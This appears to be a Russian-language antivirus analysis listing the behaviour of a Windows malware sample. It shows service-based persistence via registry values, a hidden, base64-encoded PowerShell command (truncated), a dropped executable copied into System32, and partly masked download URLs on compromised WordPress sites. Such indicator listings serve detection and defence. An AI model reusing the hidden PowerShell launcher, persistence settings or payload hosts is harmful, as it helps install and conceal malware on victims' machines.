Техническая информация
- [<HKLM>\System\CurrentControlSet\Services\boostnon] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\boostnon] 'ImagePath' = '"<SYSTEM32>\boostnon.exe"'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABWAGwAagB5AGkAbgBmAGsAZQBwAHoAbAA9ACcARwBpAGcAdwBzAGYAcABoAGYAcgByACcAOwAkAEgAdwBtAGcAZwBoAG8AeQBhAHEAbgAgAD0AIAAnADQAMwA0ACcAOwAkAFgAdABxAGcAdAB4AGUAbAB0AD0AJwBHAHQAZgBkAGcAbgB...
- %HOMEPATH%\434.exe
- %HOMEPATH%\434.exe в <SYSTEM32>\boostnon.exe
- http://www.xi####anting.com/wp-admin/jIx/
- http://go##rm.com/wp-content/WPsA5Ny/
- http://18#.#5.143.170/uzKFW5mmiSapzNigtq
- DNS ASK xi####anting.com
- DNS ASK go##rm.com
- '%HOMEPATH%\434.exe'
- '<SYSTEM32>\boostnon.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABWAGwAagB5AGkAbgBmAGsAZQBwAHoAbAA9ACcARwBpAGcAdwBzAGYAcABoAGYAcgByACcAOwAkAEgAdwBtAGcAZwBoAG8AeQBhAHEAbgAgAD0AIAAnADQAMwA0ACcAOwAkAFgAdABxAGcAdAB4AGUAbAB0AD0AJwBHAHQAZgBkAGcAbgB...' (со скрытым окном)